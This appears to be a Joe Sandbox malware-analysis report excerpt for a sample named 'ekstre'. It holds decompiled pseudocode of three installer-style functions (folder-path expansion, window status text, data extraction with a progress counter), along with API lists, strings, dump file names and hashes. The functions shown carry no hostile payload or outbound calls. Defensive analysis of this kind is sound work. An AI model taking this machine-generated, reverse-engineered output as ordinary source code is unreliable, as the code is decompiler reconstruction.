GetFileAttributesA.KERNEL32(007BDF00,?,007EF000,00000009,0000000B), ref: 00403B28
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,007F1000), ref: 00403B71
RegisterClassA.USER32(007C1F00), ref: 00403BAE
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BC6
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BFB
ShowWindow.USER32(00000005,00000000,?,007EF000,00000009,0000000B), ref: 00403C31
GetClassInfoA.USER32(00000000,RichEdit20A,007C1F00), ref: 00403C5D
GetClassInfoA.USER32(00000000,RichEdit,007C1F00), ref: 00403C6A
RegisterClassA.USER32(007C1F00), ref: 00403C73
DialogBoxParamA.USER32(?,00000000,00403DB7,00000000), ref: 00403C92

Strings

RichEdit, xrefs: 00403C64
h{, xrefs: 00403A46
RichEd32, xrefs: 00403C45
RichEd20, xrefs: 00403C37
.exe, xrefs: 00403B17
_Nb, xrefs: 00403B8D, 00403BF5
.DEFAULT\Control Panel\International, xrefs: 00403A80
RichEdit20A, xrefs: 00403C55, 00403C5B
Control Panel\Desktop\ResourceLocale, xrefs: 00403A4E

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$h{
API String ID: 606308-796287222
Opcode ID: fce42fd06847e8b204695c8d1af10d699451b87d998d25604c18b81cf034ac1f
Instruction ID: 5ddc04f458ae52a3378d50e56fefae16c5672a1df0abdb0b3b38ae058e06b781
Opcode Fuzzy Hash: fce42fd06847e8b204695c8d1af10d699451b87d998d25604c18b81cf034ac1f
Instruction Fuzzy Hash: 6F61E571244604AEE3106F659D46F3B3B6CEB8574AF00403EF941B62E3CB7DAD419A2D

Uniqueness

Uniqueness Score: -1.00%

Function 004062C7 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E004062C7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				char _t50;
				char _t52;
				char _t54;
				void* _t62;
				char* _t63;
				signed int _t77;
				char _t85;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t94;
				signed int _t96;
				void* _t97;

				_t89 = __esi;
				_t86 = __edi;
				_t62 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x7c1f3c - 4 + _t36 * 4);
				}
				_push(_t62);
				_push(_t89);
				_push(_t86);
				_t63 = _t36 +  *0x7c5f98;
				_t37 = 0x7bdf00;
				_t87 = 0x7bdf00;
				if(_a4 >= 0x7bdf00 && _a4 - 0x7bdf00 < 0x4000) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t85 =  *_t63;
					if(_t85 == 0) {
						break;
					}
					__eflags = _t87 - _t37 - 0x2000;
					if(_t87 - _t37 >= 0x2000) {
						break;
					}
					_t63 = _t63 + 1;
					__eflags = _t85 - 4;
					_a8 = _t63;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t85;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t63;
							_t87 =  &(_t87[1]);
							_t63 = _t63 + 1;
						}
						continue;
					}
					_t39 =  *((char*)(_t63 + 1));
					_t77 =  *_t63;
					_t94 = (_t39 & 0x0000007f) << 0x00000007 | _t77 & 0x0000007f;
					_v24 = _t77;
					_v28 = _t77 | 0x00000080;
					_v16 = _t39;
					_v20 = _t39 | 0x00000080;
					_t63 = _a8 + 2;
					__eflags = _t85 - 2;
					if(_t85 != 2) {
						__eflags = _t85 - 3;
						if(_t85 != 3) {
							__eflags = _t85 - 1;
							if(_t85 == 1) {
								__eflags = (_t39 | 0xffffffff) - _t94;
								E004062C7(_t63, _t87, _t94, _t87, (_t39 | 0xffffffff) - _t94);
							}
							L42:
							_t87 =  &(_t87[lstrlenA(_t87)]);
							_t37 = 0x7bdf00;
							continue;
						}
						__eflags = _t94 - 0x1d;
						if(_t94 != 0x1d) {
							__eflags = (_t94 << 0xd) + 0x7c7000;
							E00406234(_t87, (_t94 << 0xd) + 0x7c7000);
						} else {
							E00406192(_t87,  *0x7c5f68);
						}
						__eflags = _t94 + 0xffffffeb - 7;
						if(_t94 + 0xffffffeb < 7) {
							L33:
							E00406512(_t87);
						}
						goto L42;
					}
					__eflags =  *0x7c601c;
					_t96 = 2;
					if( *0x7c601c != 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x7c5fe4;
						if( *0x7c5fe4 != 0) {
							_t96 = 4;
						}
						__eflags = _t77;
						if(__eflags >= 0) {
							__eflags = _t77 - 0x25;
							if(_t77 != 0x25) {
								__eflags = _t77 - 0x24;
								if(_t77 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x2000);
									_t96 = 0;
								}
								while(1) {
									__eflags = _t96;
									if(_t96 == 0) {
										goto L30;
									}
									_t50 =  *0x7c5f64;
									_t96 = _t96 - 1;
									__eflags = _t50;
									if(_t50 == 0) {
										L26:
										_t52 = SHGetSpecialFolderLocation( *0x7c5f68,  *(_t97 + _t96 * 4 - 0x18),  &_v8);
										__eflags = _t52;
										if(_t52 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t87);
										_v12 = _t52;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t54 =  *_t50( *0x7c5f68,  *(_t97 + _t96 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x2000);
							goto L30;
						} else {
							E0040611B((_t77 & 0x0000003f) +  *0x7c5f98, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t77 & 0x0000003f) +  *0x7c5f98, _t87, _t77 & 0x00000040); // executed
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062C7(_t63, _t87, _t96, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags =  *0x7c601e - 0x45a;
					if( *0x7c601e >= 0x45a) {
						goto L13;
					}
					__eflags = _t39 - 0x23;
					if(_t39 == 0x23) {
						goto L13;
					}
					__eflags = _t39 - 0x2e;
					if(_t39 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00406234(_a4, _t37);
			}

0x004062c7
0x004062c7
0x004062c7
0x004062cd
0x004062d2
0x004062e3
0x004062e3
0x004062eb
0x004062ec
0x004062ed
0x004062ee
0x004062f1
0x004062f9
0x004062fb
0x00406312
0x00406315
0x00406315
0x004064ef
0x004064ef
0x004064f3
0x00000000
0x00000000
0x00406322
0x00406328
0x00000000
0x00000000
0x0040632e
0x0040632f
0x00406332
0x00406335
0x004064e2
0x004064ec
0x004064ee
0x004064ee
0x004064e4
0x004064e6
0x004064e8
0x004064e9
0x004064e9
0x00000000
0x004064e2
0x0040633b
0x0040633f
0x0040634f
0x00406356
0x00406359
0x00406361
0x00406364
0x0040636b
0x0040636c
0x0040636f
0x0040648f
0x00406492
0x004064c2
0x004064c5
0x004064ca
0x004064ce
0x004064ce
0x004064d3
0x004064d9
0x004064db
0x00000000
0x004064db
0x00406494
0x00406497
0x004064ac
0x004064b3
0x00406499
0x004064a0
0x004064a0
0x004064bb
0x004064be
0x00406487
0x00406488
0x00406488
0x00000000
0x004064be
0x00406375
0x0040637e
0x0040637f
0x0040639c
0x0040639c
0x004063a3
0x004063a3
0x004063aa
0x004063ae
0x004063ae
0x004063af
0x004063b1
0x004063ea
0x004063ed
0x004063fd
0x00406400
0x00406408
0x0040640e
0x0040640e
0x0040646d
0x0040646d
0x0040646f
0x00000000
0x00000000
0x00406412
0x00406419
0x0040641a
0x0040641c
0x00406436
0x00406444
0x0040644a
0x0040644c
0x0040646a
0x0040646a
0x0040646a
0x00000000
0x0040646a
0x00406452
0x0040645b
0x0040645e
0x00406464
0x00406468
0x00000000
0x00000000
0x00000000
0x00406468
0x0040641e
0x00406421
0x00000000
0x00000000
0x00406430
0x00406432
0x00406434
0x00000000
0x00000000
0x00000000
0x00406434
0x00000000
0x0040646d
0x004063f5
0x00000000
0x004063b3
0x004063ce
0x004063d3
0x004063d6
0x00406476
0x00406476
0x0040647a
0x00406482
0x00406482
0x00000000
0x0040647a
0x004063e0
0x00406471
0x00406471
0x00406474
0x00000000
0x00000000
0x00000000
0x00406474
0x004063b1
0x00406381
0x0040638a
0x00000000
0x00000000
0x0040638c
0x0040638f
0x00000000
0x00000000
0x00406391
0x00406394
0x00000000
0x00406396
0x00406396
0x00000000
0x00406396
0x00406394
0x004064f9
0x00406503
0x0040650f
0x0040650f
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(007BDF00,00002000), ref: 004063F5
GetWindowsDirectoryA.KERNEL32(007BDF00,00002000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,00000000,0040538D,Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,00000000), ref: 00406408
SHGetSpecialFolderLocation.SHELL32(0040538D,76E723A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,00000000,0040538D,Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,00000000), ref: 00406444
SHGetPathFromIDListA.SHELL32(76E723A0,007BDF00), ref: 00406452
CoTaskMemFree.OLE32(76E723A0), ref: 0040645E
lstrcatA.KERNEL32(007BDF00,\Microsoft\Internet Explorer\Quick Launch), ref: 00406482
lstrlenA.KERNEL32(007BDF00,?,Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,00000000,0040538D,Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,00000000,00000000,0079EE4E,76E723A0), ref: 004064D4

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll, xrefs: 004062EC
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063C4
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040647C

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-3872245477
Opcode ID: 05beea9c2200e4339c4589f30d71f1b0f05bb69f4356543a49310692c94cd44b
Instruction ID: 780d57d12d18bacdf627d66ab7eec5908f792e41889780379f835f4b7a3ad036
Opcode Fuzzy Hash: 05beea9c2200e4339c4589f30d71f1b0f05bb69f4356543a49310692c94cd44b
Instruction Fuzzy Hash: 26615570900114AEEF216F24CD94BBE3BA5AB05310F16813FE943BA2D1D73D89A1DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405355 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405355(CHAR* _a4, char _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7c1f44;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x7c6014;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062C7(0, _t39, 0x7acd48, 0x7acd48, _a4);
					}
					_t26 = lstrlenA(0x7acd48);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x7c1f28, 0x7acd48); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7acd48;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x7acd48)) = 0;
							return _t28;
						}
					} else {
						_t6 =  &_a8; // 0x40327b
						_t26 =  &(_a4[lstrlenA( *_t6)]);
						if(_t26 < 0x4000) {
							_t8 =  &_a8; // 0x40327b
							_t26 = lstrcatA(0x7acd48,  *_t8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x0040535b
0x00405367
0x0040536a
0x00405370
0x0040537c
0x0040537f
0x00405382
0x00405388
0x00405388
0x0040538e
0x00405396
0x00405399
0x004053b6
0x004053ba
0x004053c3
0x004053c3
0x004053cd
0x004053d6
0x004053e2
0x004053e9
0x004053ed
0x004053f0
0x00405403
0x00405411
0x00405411
0x00405415
0x00405417
0x0040541a
0x00000000
0x0040541a
0x0040539b
0x0040539b
0x004053a3
0x004053ab
0x004053ad
0x004053b1
0x00000000
0x004053b1
0x004053ab
0x00405399
0x00405424

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,00000000,0079EE4E,76E723A0,?,?,?,?,?,?,?,?,?,0040327B,00000000,?), ref: 0040538E
lstrlenA.KERNEL32({2@,Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,00000000,0079EE4E,76E723A0,?,?,?,?,?,?,?,?,?,0040327B,00000000), ref: 0040539E
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,00000020,{2@,Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,00000000,0079EE4E,76E723A0), ref: 004053B1
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll), ref: 004053C3
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E9
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405403
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405411

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll, xrefs: 00405375, 00405387, 0040538D, 004053B0, 004053BC
{2@, xrefs: 0040539B, 004053AD

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll${2@
API String ID: 2531174081-1588867804
Opcode ID: fcac808d76aed6db0d37f44b4683b04ac6d9e07f0b6d68d9f287ec4d5548b40c
Instruction ID: 4681376622a190fc029a1f8c6300b99c7a2c44d7a72f4c8551b7a94c51a1d200
Opcode Fuzzy Hash: fcac808d76aed6db0d37f44b4683b04ac6d9e07f0b6d68d9f287ec4d5548b40c
Instruction Fuzzy Hash: B7218E71900118BBCB119FA5DD84EDEBFA9EF09354F10807AF944B6291C7784A908B98

Uniqueness

Uniqueness Score: -1.00%

Function 00403143 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00403143(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x79ed20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403348( *0x7c5fb8 + _t62);
				}
				if(E00403332( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E00403332(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E00403332(0x79ad20, _t97) == 0) {
								goto L41;
							}
							_t69 = E00405E6E(_a8, 0x79ad20, _t97); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x414478 =  *0x414478 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x414460 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E00403332(0x79ad20, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x414450 = 0x79ad20;
						 *0x414454 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x414458 = _t94;
							 *0x41445c = _v12;
							_t74 = E00406765(0x414450);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x414458; // 0x79ee4e
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7c6014 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E00405355(0,  &_v88);
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x414458; // 0x79ee4e
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E00405E6E(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x0040314b
0x0040314f
0x00403152
0x00403157
0x00403159
0x00403159
0x00403160
0x00403164
0x00403169
0x0040316b
0x0040316b
0x00403172
0x00403177
0x00403182
0x00403182
0x00403194
0x00403320
0x00403320
0x00000000
0x0040319a
0x0040319e
0x004032cd
0x00403310
0x00403312
0x00403312
0x0040331e
0x00403325
0x00403328
0x00000000
0x00000000
0x00000000
0x00000000
0x0040331e
0x004032d2
0x00000000
0x00000000
0x004032d4
0x004032d7
0x004032da
0x004032dd
0x004032df
0x004032df
0x004032ef
0x00000000
0x00000000
0x004032f6
0x004032fd
0x004032c7
0x004032c7
0x00403322
0x00403322
0x00000000
0x00403322
0x004032ff
0x00403302
0x00403309
0x00000000
0x00000000
0x00000000
0x0040330b
0x00000000
0x004032d7
0x004031aa
0x004031ac
0x004031b3
0x004031b3
0x004031ba
0x004031c0
0x004031c7
0x004031ca
0x00000000
0x00000000
0x00000000
0x00000000
0x004031d0
0x004031d0
0x004031d0
0x004031d8
0x004031da
0x004031da
0x004031eb
0x00000000
0x00000000
0x004031f1
0x004031f4
0x004031fa
0x00403200
0x00403200
0x0040320b
0x00403211
0x00403216
0x0040321d
0x00403220
0x00000000
0x00000000
0x00403226
0x0040322c
0x0040322e
0x00403237
0x00403239
0x00403267
0x0040326d
0x00403276
0x0040327b
0x0040327b
0x00403280
0x004032bb
0x00000000
0x00000000
0x00000000
0x00403282
0x00403286
0x0040329d
0x004032a2
0x004032a5
0x004032a8
0x004032ab
0x004032af
0x00000000
0x00000000
0x00000000
0x004032b5
0x0040328f
0x00403296
0x00000000
0x00000000
0x00403298
0x00000000
0x00403298
0x00403280
0x004032c3
0x00000000
0x004032c3
0x00000000
0x004031d0

APIs

GetTickCount.KERNEL32 ref: 004031AA
GetTickCount.KERNEL32 ref: 0040322E
MulDiv.KERNEL32(7FFFFFFF,00000064,00000007), ref: 00403257
wsprintfA.USER32 ref: 00403267

Strings

y, xrefs: 0040316B
Ny, xrefs: 0040320B, 00403226, 0040329D
... %d%%, xrefs: 00403261
y, xrefs: 004032F3, 00403200, 0040328C, 00403289

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: y$ y$... %d%%$Ny
API String ID: 551687249-4120447693
